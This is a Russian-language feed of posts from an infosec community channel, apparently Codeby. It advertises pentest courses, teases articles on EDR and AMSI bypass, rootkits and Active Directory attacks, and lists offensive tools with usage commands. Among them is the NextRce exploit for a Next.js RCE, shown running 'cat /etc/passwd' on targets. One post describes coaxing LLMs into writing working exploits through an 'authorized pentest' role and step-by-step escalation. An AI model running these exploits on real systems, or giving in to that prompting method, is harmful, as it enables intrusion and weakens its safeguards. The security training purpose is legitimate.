34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Вендор говорит «закрыто» — а дыра всё ещё открыта
🔍 CVE в ядре Linux закрывается в mainline за дни. Но в RHEL 8 или Ubuntu LTS тот же патч может прийти через месяц — или прийти «кастрированным», когда attack surface остался нетронутым.
Именно так работал CVE-2024-1086: use-after-free в nf_tables, CVSS 7.8, публичный эксплоит с 99.4% успешностью — а backport в ветку 5.15 всё ещё ждал очереди.
Проблема глубже:
• Неполный cherry-pick — из трёх нужных коммитов в stable попали два
• Конфликт адаптации — патч компилируется, тесты проходят, дыра остаётся
• Потеря связи — backport меняет commit hash, и grep CVE-xxxx changelog ничего не найдёт
https://codeby.net/threads/obnaruzheniye-cve-v-yadre-linux-avtomatizatsiya-poiska-nezakrytykh-uyazvimostei-v-backport-patchakh.92665/
60 млн загрузок в неделю — и CVSS 10.0. Но реальна ли угроза?
Исследователь, нашедший баг в Axios, сам говорит: «в реальном продакшене это не должно сработать». При этом NVD ставит максимальный балл.
🔗 CVE-2026-40175 — цепочка из трёх CWE:
• CWE-113 — CRLF-инъекция в заголовках
• CWE-444 — HTTP Request Smuggling
• CWE-918 — SSRF до AWS IMDS
Схема атаки: сторонняя библиотека (qs, minimist) загрязняет Object.prototype → Axios подхватывает «грязное» свойство при merge конфигов → CRLF разрывает HTTP-запрос → контрабандный PUT уходит на 169.254.169.254 за IMDSv2-токеном.
💡 Scope: Changed в CVSS-векторе — вот почему 10.0, а не 9.8. Атака выходит за пределы Axios и бьёт по облачной инфраструктуре.
Полный разбор — где цепочка ломается и в каких edge-кейсах работает:
https://codeby.net/threads/cve-2026-40175-axios-uyazvimost-razbor-tsepochki-prototype-pollution-rce-i-obkhod-aws-imdsv2.92674/
🤖 Linux - это база, без которой сложно двигаться дальше.
Пентест, DevOps, backend, CTF - всё крутится вокруг Linux. Но большинство изучают его хаотично: случайные команды, копипаст и никакой системы.
Мы собрали курс, который даёт цельную базу с нуля - от командной строки до Docker и Ansible.
В программе:
⏺️терминал и работа с файловой системой
⏺️пользователи, права и процессы
⏺️сеть и основы безопасности
⏺️серверные сервисы: Apache и MySQL
⏺️Docker, bash и автоматизация
⏺️Ansible
После курса Linux перестаёт быть «чёрным ящиком»: команды становятся понятными, терминал - рабочим инструментом, а серверная часть больше не вызывает ступор.
5 модулей. 16 уроков. Последовательная программа.
➡️ Подробности и программа курса
Waymore: Инструмент для извлечения URL и контента из веб-архивов
Waymore — утилита с открытым исходным кодом для извлечения URL-адресов и загрузки архивных ответов из нескольких источников: Wayback Machine, Common Crawl, Alien Vault OTX, URLScan, VirusTotal, GhostArchive. Инструмент предназначен для сбора данных о целевом домене, включая ссылки на ресурсы и сохраненные версии веб-страниц, что полезно для анализа поверхности атаки, поиска уязвимостей и OSINT-исследований.
pipх install waymore
waymore -h
waymore -i example.com -mode U
waymore -i target.com -mode B -mc 200 -mt text/html,application/json -l 10000
#первый запуск
waymore -i target.com -mode U -oU urls.txt
#последующие запуски
waymore -i target.com -mode U -oU urls.txt -nlf
waymore -i target.com -ko '\.(env|config|json|xml|sql|log)($|\?)' -mode U
waymore -i target.com -mode R -ci m -mc 200
waymore -i target.com --check-only
waymore -i example.com -mode U | unfurl keys | sort -u
CrowdStrike поймал мой лоадер за 4 секунды. Не по сигнатуре — по поведению
Три дня на кастомный лоадер: шифрованный шеллкод, indirect syscalls через SysWhispers3, Early Bird APC injection в RuntimeBroker.exe. На стенде — тишина. На продакшене Falcon сработал через четыре секунды. Причина: поведенческий паттерн, а не бинарник.
🔍 Три вектора против EDR в 2026 году:
• Blinding — EDRSilencer через WFP блокирует телеметрию, но список процессов неполный — нужна доработка
• Blocking — BYOVD или Safe Mode Boot. Требует привилегий ядра, но ransomware-группы уже используют
• Hiding — LOLBins и DLL Side-Loading. По данным CrowdStrike, 82% атак обходятся без вредоносных бинарников
⚡️ Indirect syscalls vs direct: второй оставляет return address вне ntdll.dll — Falcon ловит именно это. HookChain показал 88% обхода на 26 EDR, но kernel callbacks продолжают работать.
Обход EDR — это про понимание цепочки: агент → SIEM → корреляция.
Подробнее: https://codeby.net/threads/red-team-vs-soc-kak-pentester-obkhodit-edr-i-siem-v-real-nykh-proyektakh.92651/
Специалисты из Anthropic анонсировали модель, которая ищет уязвимости нулевого дня.
Claude Mythos Preview — это не выпущенная на рынок передовая модель общего назначения, которая демонстрирует поразительный факт: модели искусственного интеллекта достигли такого уровня в программировании, что могут превзойти всех, кроме самых опытных специалистов, в поиске и использовании уязвимостей в программном обеспечении.
Руткит без Ring 0: как атакующие прячутся прямо у вас под носом
Большинство аналитиков при слове «руткит» смотрят в ядро. А атакующий работает в Ring 3 — и ему этого хватает.
🎯 Userland-руткиты перехватывают вызовы до ядра — на уровне libc или ntdll.dll. Никаких LKM, Secure Boot и риска kernel panic. Просто подмена реальности для всех userland-инструментов.
Переменная LD_PRELOAD или запись в /etc/ld.so.preload заставляют каждый динамически слинкованный бинарь загружать вашу библиотеку. Перехватываешь readdir() — и ls, ps, netstat перестают видеть нужные файлы и процессы.
🔍 Слепые пятна: strace, сравнение /proc с сырыми syscall-данными, мониторинг /etc/ld.so.preload.
В разборе — код для Linux и Windows, IAT/EAT hooking, DLL injection и детект каждой техники:
https://codeby.net/threads/userland-rootkit-tekhniki-sokrytiya-ld_preload-dll-injection-iat-eat-hooking-na-praktike.92638/
Пять минут или пять часов — вот цена незнания системы
Ты получил shell. Курсор мигает от имени www-data. До root — один шаг. Но насколько быстро ты его сделаешь?
🔍 Ручная разведка решает больше, чем кажется. Одна команда id может закрыть вопрос сразу: если пользователь в группе docker или lxd — root достижим без единого эксплойта.
⚡ Дальше в ход идёт LinPEAS: он находит то, что глаз пропускает — capabilities на бинарях, writable PATH-директории, токены в переменных окружения. Плюс разбор LinEnum и ручные техники: SUID-биты, cron-задачи, sudo -l с GTFOBins.
🎯 Весь путь от первой команды после foothold до полного root-доступа — с конкретными командами и объяснением, почему каждая мисконфигурация опасна.
Полный разбор:
https://codeby.net/threads/povysheniye-privilegii-linux-ot-pervichnoi-razvedki-do-root-cherez-linpeas-linenum-i-ruchnyye-tekhniki.92611/
LLM генерирует рабочие эксплойты — и это уже не фантастика
5 моделей: GPT-4o, Claude, Gemini, Copilot, DeepSeek. 10 CVE. Итог — 100% покрытие: для каждой уязвимости хотя бы одна модель выдала рабочий PoC за 3–4 раунда промптинга. 🎯
Секрет — методология RSA: модели назначают роль («senior security researcher, authorized pentest»), создают легитимный сценарий и последовательно наращивают глубину запросов. Социальная инженерия, только цель — LLM.
LLM встраивается в каждую фазу kill chain:
• Разведка — коррелирует вывод Nmap/subfinder, приоритизирует поверхность атаки
• Анализ кода — ищет паттерны уязвимостей быстрее ручного ревью
• Генерация PoC — работает на типовых CVE, галлюцинирует на нетривиальных chain-эксплойтах
Полный разбор с промптами и кодом:
https://codeby.net/threads/ii-v-penteste-real-nyye-tekhniki-ispol-zovaniya-llm-v-atakuyushchikh-operatsiyakh.92644/
🚩 Новые задания на платформе HackerLab!
🕵️ Категория Форензика — Таска не будет, я устал
——————————————
🗂 В архив добавлены задания + райтапы:
— Веб - Прыжок
— Веб - GhostRegister
Приятного хакинга!
🔍 80% успешных атак рождаются до запуска эксплойта
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с --rate=1000 — иначе положишь клиентскую сеть
2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
Усовершенствованный сканер уязвимостей на основе искусственного интеллекта и инструмент для тестирования на проникновение, который объединяет в себе различные ИИ-сервисы (OpenAI, Grok, OLLAMA, Claude) с комплексными модулями тестирования для автоматического поиска уязвимостей, интеллектуальной генерацией полезной нагрузки и составления профессиональных отчетов.
git clone https://github.com/zakirkun/deep-eye.git
cd deep-eye
pip install -r requirements.txt
# Редактируйте config.yaml в соответствии с вашими API-ключами
cp config/config.example.yaml config/config.yaml
python deep_eye.py -u https://example.com
python deep_eye.py -u https://testsite.com --recon --full-scan --format pdf -o full_report.pdf
python deep_eye.py -u https://testsite.com --ai-provider claude --proxy http://127.0.0.1:8080
💻 Living Off The Land Active Directory
Exploiting Native AD Techniques for Security
# Collect Domain SID
Get-ADDomain | Select-Object SID
# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}
# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate
# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName
# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName
# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName
Набор инструментов для создания полезной нагрузки. В инструменте реализован модульный подход, позволяющий добавлять новые функции с минимальными затратами времени на изучение структуры инструмента.
sickle-pdk -m diff -r calc.exe BINFILE=calc2.exe MODE=htxdump
sickle-pdk -m run -r shellcode.bin
sickle-pdk -r generic_sc -m disassemble
sickle-pdk -r generic_sc -f rust
lonkero
Профессиональный сканер для реального тестирования на проникновение. Быстрый. Модульный. Rust.
Lonkero — это профессиональный сканер веб-безопасности уровня production, созданный специально для серьёзного security-тестирования.
Он имеет мощный Intelligent Mode с контекстно-ориентированным сканированием, автоматическим определением технологий, дедупликацией эндпоинтов и оценкой риска для каждого параметра. Благодаря встроенной ML-системе автообучения сканер с каждой новой проверкой снижает количество ложных срабатываний, используя серверную модель обнаружения. Сканер умело пропускает внутренние компоненты фреймворков и сосредотачивается исключительно на реальных уязвимостях, при этом отлично поддерживает современный стек: Next.js, React, GraphQL, gRPC, WebSocket и HTTP/3. Благодаря умной фильтрации параметров сканирование стало примерно на 80 % быстрее. Lonkero также использует продвинутые техники обнаружения слепых уязвимостей.
sudo apt install cargo build-essential pkg-config libssl-dev rustfmt -y
git clone https://github.com/bountyyfi/lonkero.git
cd lonkero
cargo build --release
sudo cp target/release/lonkero /usr/local/bin
lonkero scan [URL]
lonkero scan [URL] --crawl
lonkero scan [URL] --cookie "session=abc123"
lonkero scan [URL] --header "Authorization: token"
lonkero scan [URL] --auth-username admin --auth-password admin
lonkero scan [URL] --subdomains
lonkero scan [URL] --dorks
lonkero scan [URL] --only sqli_enhanced,xss_enhanced,ssrf
👆Курс «Основы Linux» доступен по подписке PRO.
В подписку также входят:
— курс «Введение в ИБ» с лабораторией
— курс «SQL Injection Master» с лабораторией + сертификат за сдачу экзамена
— Доступ ко всем CTF-заданиям платформы
— Pro-лаборатории
Это не доступ к одному курсу, а сразу к нескольким направлениям обучения и практики.
❗️Напоминаем: до конца апреля подписку PRO можно оформить со скидкой 20% по промокоду PRO20
Антивирус молчит, а данные уходят на C2 — это kernel-mode руткит
Меньше 1% малвари — руткиты. Но именно они стоят за APT-кампаниями и скрытым майнингом. Причина: руткит работает на уровне ядра и контролирует, что система «видит».
🔍 Как устроено изнутри:
• DKOM — удаляет процесс из ActiveProcessLinks, он исчезает из диспетчера задач, оставаясь живым
• SSDT hooking — перехватывает системные вызовы до обработки ядром
• Minifilter + kernel callbacks — фильтрует файловый I/O и ослепляет защиту
🛠 Детектировать DKOM: сравни !process 0 0 и !poolfind Proc 0 в WinDbg. Если pool scan находит EPROCESS с PID, которого нет в списке — прямой индикатор атаки. В Volatility 3: расхождение между windows.pslist и windows.psscan выдаёт DKOM мгновенно.
https://codeby.net/threads/rootkit-obnaruzheniye-windows-dkom-ssdt-hooking-minifilter-i-callback-manipulyatsii-cherez-windbg-i-volatility.92639/
Сколько платят в кибербезопасности в 2025? Реальные цифры от рекрутера
💼 Человек, закрывший 120+ вакансий в ИБ, разложил рынок по полочкам. Спойлер: заголовки про «миллион в месяц» и реальность расходятся сильно.
📊 Медианные зарплаты по Москве:
• Junior / SOC L1 — 80–120 тыс. ₽
• Пентестер middle — 220 тыс. ₽
• CISO — от 500 тыс. ₽
Номинально зарплаты выросли на 31% с 2022 года. Но инфляция за тот же период — 30–35%. Реальный рост покупательной способности? Почти нулевой.
🎯 Рынок сменил логику: вместо трёх джунов компании берут одного senior. Конкуренция за стартовые позиции выросла, «просто пройти курс» уже не работает. Зато на хороших пентестеров — натуральная охота.
Полный разбор с таблицами по специализациям, требованиями работодателей и советами по резюме для junior:
https://codeby.net/threads/zarplata-v-kiberbezopasnosti-2025-real-nyye-tsifry-vostrebovannyye-spetsializatsii-i-rezyume-dlya-junior.92609/
Первый хеш — быстрее, чем заваривается кофе
🎯 На каждом внутреннем пентесте сценарий один и тот же: подключился к VLAN, запустил Responder — и NTLMv2-хеш уже в терминале. Без харденинга AD путь до Domain Admin занимает пару часов.
Mandiant фиксирует: 9 из 10 кибератак эксплуатируют Active Directory. Три меры закрывают основные векторы первых часов атаки:
• Отключить LLMNR — пять минут в GPO, один вектор credential harvesting исчезает
• NBT-NS disable — есть грабли со скейлингом через NIC, разбираем правильный путь
• LAPS — без него один крекнутый хеш локального админа открывает всю подсеть через Pass the Hash
Внутри — GPO-пути, ключи реестра, PowerShell-команды верификации и грабли из инфраструктур от 200 до 3000 машин.
https://codeby.net/threads/khardening-active-directory-laps-llmnr-i-nbt-ns-tri-mery-protiv-80-vnutrennikh-atak.92656/
NextRce
NextRce - инструмент для эксплуатации уязвимости RSC в Next.js (CVE-2025-55182).
NextRce — это высокопроизводительный многопоточный инструмент безопасности, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-55182. Он нацелен на реализацию React Server Components (RSC) в архитектуре App Router Next.js. Манипулируя процессом сериализации в Server Actions, NextRce внедряет специально созданную полезную нагрузку для достижения удаленного выполнения кода (RCE) на уязвимых экземплярах. Он оснащен интеллектуальным механизмом обнаружения, который автоматически различает уязвимые архитектуры App Router и безопасные устаревшие Pages Router, обеспечивая эффективность при массовом сканировании.
git clone https://github.com/ynsmroztas/NextRce.git
cd NextRce/
pip install requests
python3 NextRCSWaff.py -u [URL] -c "whoami" --bypass
python3 nextrce.py -u [URL] -c "cat /etc/passwd"
python3 nextrce.py -l [TXT] -c "whoami" -t 100
Обновили профили на форуме: теперь видно, кто есть кто
Странная штука: открываешь тред с нетривиальным разбором, отвечают двое. Один с двумя сотнями сообщений, второй с двадцатью тысячами. Оба уверенно, оба по делу. Новичок листает и не понимает, кому верить.
А на форуме годами сидят люди с OSCP, сотнями машин на HTB, реальными пентестами, опытом в BlueTeam крупных контор. И ничего этого рядом с ником не видно. Тот, кто десять лет ковыряет периметр банков, и тот, кто зарегался вчера — в ленте выглядят одинаково.
Дело не в понтах. Один и тот же совет от этих двоих весит по-разному, и важно понимать, от кого он.
Переделали профили. Теперь можно показать специализацию, сертификаты, HTB, TryHackMe, HackerLab, портфолио — всё цепляется к мини-профилю у каждого поста. Плюс верификация, чтобы строчка про OSCP была не просто строчкой. Заполнять никто не гонит, заполнение профиля дело добровольное.
Подробности — в анонсе:
https://codeby.net/threads/obnovili-profili-teper-vidno-kto-yest-kto.92647/
DNSDiag: Набор инструментов для измерения, диагностики и аудита безопасности DNS
DNSDiag — это набор утилит с открытым исходным кодом для измерения производительности DNS-серверов, диагностики проблем с резолвингом и аудита безопасности DNS-трафика. Инструментарий включает три основных компонента: dnsping для измерения задержек и надежности DNS-серверов, dnstraceroute для трассировки пути DNS-запросов и dnseval для сравнительного анализа множества резолверов.
pipх install dnsdiag
dnsdiag -h
dnsping -c 5 -s 8.8.8.8 google.com
dnsping -c 3 --dnssec --flags -s 8.8.8.8 cloudflare.com
dnsping -c 10 -q -s 1.1.1.1 github.com
dnstraceroute -s 8.8.8.8 google.com
dnstraceroute --asn -s 1.1.1.1 cloudflare.com
dnseval -f public-servers.txt -c 10 github.com
dnseval --dnssec -c 10 -f public-servers.txt ripe.net
cat results.jsonl | jq -r 'select(.data.r_lost_percent == 0) | .data.resolver'
Каждый третий сотрудник отдаёт пароль. Добровольно.
🎭 Компании тратят миллионы на файрволы и SIEM — и ломаются на одном звонке от «IT-поддержки». Не потому что сотрудники глупые. Потому что атака бьёт по психике, а не по софту.
Автор статьи проводит легальные red team-проекты: рассылает фишинг, звонит под видом техподдержки, проходит через проходные с поддельным бейджем. Вот что он видит изнутри:
• 34% сотрудников без тренингов кликают на фишинговые письма — каждый третий
• Срочность и страх отключают критическое мышление быстрее любого эксплойта
• Флешка с надписью «Зарплаты руководства» на парковке — и кто-то обязательно воткнёт её в рабочий ПК
🔍 Атака проходит 4 фазы: разведка → контакт → эксплуатация → выход. Если вас торопят с решением или «прощупывают» вопросами о компании — вы уже внутри сценария.
Полный разбор методов и защиты — в статье:
https://codeby.net/threads/sotsial-naya-inzheneriya-metody-atak-i-prakticheskaya-zashchita.92632/
Твой AMSI-bypass уже в сигнатурной базе — и ты об этом знаешь
🔴 Бикон ожил, но через 30 секунд — тишина. EDR срезал соединение, SOC смотрит на алерт. В 2025 классика «AmsiScanBuffer patch + Invoke-Mimikatz» не работает.
⚙️ Три вещи, которые меняют картину:
• Hardware breakpoints — обход AMSI без единого байта записи в память amsi.dll
• Для shellcode AMSI bypass вообще не нужен — лишний IoC, лишний шум
• Главный вектор детекта патчинга — не сам патч, а вызов VirtualProtect на страницу amsi.dll
📖 Разбор четырёх слоёв защиты — AMSI, ETW, userland hooks, kernel callbacks — с рабочим кодом на C/C++ и PowerShell, проверенным против конкретных EDR.
Полный разбор с кодом:
https://codeby.net/threads/obkhod-amsi-i-antivirusnykh-khukov-prakticheskoye-rukovodstvo-dlya-offensive-razrabotchika-2025-2026.92620/
😁😆😁 напомнить в канале что запись на курс «Профессия SOC-аналитик» — продлится до 27 апреля
Читать полностью…
WebSift
WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git
cd WebSift/
cd WebSift/
bash websift.sh
Какой сертификат пентестера реально стоит денег?
CEH стоит в вакансиях рядом с OSCP — но это как сравнивать вождение в симуляторе с реальной трассой. Один экзамен проверяет умение ткнуть в правильный вариант из четырёх, другой — взломать машину и написать отчёт за 48 часов.
🔐 Автор лично сдал OSCP и eJPT, готовился к PNPT и видел CEH у коллег. Вот его вывод:
• OSCP — минимальный порог для консалтинга и red team. Без него резюме часто не открывают.
• CEH — нужен для госсектора и compliance, а не для реального взлома.
• eJPT/PNPT — старт для тех, кто ещё не готов к OSCP, но хочет практики.
⚡ В OSCP+ 2025 убрали бонусные баллы за курс — теперь всё решает только экзамен. Жёстче, но честнее.
Полный разбор форматов, цен и рекомендаций:
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/
Один граф — и весь домен как на ладони
🔍 Получил учётку рядового пользователя в домене? У тебя есть минуты, чтобы найти путь до Domain Admin — пока SOC не среагировал.
BloodHound превращает тысячи объектов Active Directory в читаемый граф атак. Никакой магии — только математика на графах.
⚡ Что внутри:
1. SharpHound.exe -c DCOnly — минимум шума, максимум данных с контроллера
2. bloodhound-python — сбор с Linux без файлов на цели
3. Cypher-запросы под нестандартные сценарии — когда стандартных путей нет
🎯 ACL-права типа GenericAll или WriteDACL на нужном объекте — это уже готовый вектор атаки, который большинство команд защиты не видит в упор.
Полный разбор от запуска коллектора до эксплуатации ACL:
https://codeby.net/threads/bloodhound-active-directory-razvedka-domena-postroyeniye-grafa-atak-i-ekspluatatsiya-acl.92606/
От доменного пользователя до Domain Admin за 15 минут
🔍 Не хвастовство — воспроизводимая цепочка. Типовые мисконфиги до сих пор живут в продакшене, и путь наверх часто короче, чем кажется.
⚔️ Полный цикл AD exploitation — от nmap-скана до DCSync — с командами и разбором флагов:
• BloodHound строит граф атаки: три-четыре промежуточных объекта до Domain Admin, которые руками не найти
• Kerberoasting и AS-REP Roasting — с настройкой уязвимой лабы на PowerShell
• В SYSVOL до сих пор лежат GPP-пароли: ключ шифрования Microsoft сама опубликовала
📖 Команды, флаги, разбор ошибок — полный гайд:
https://codeby.net/threads/pentest-active-directory-polnyi-gaid-ot-razvedki-do-domain-admin-v-2026.92603/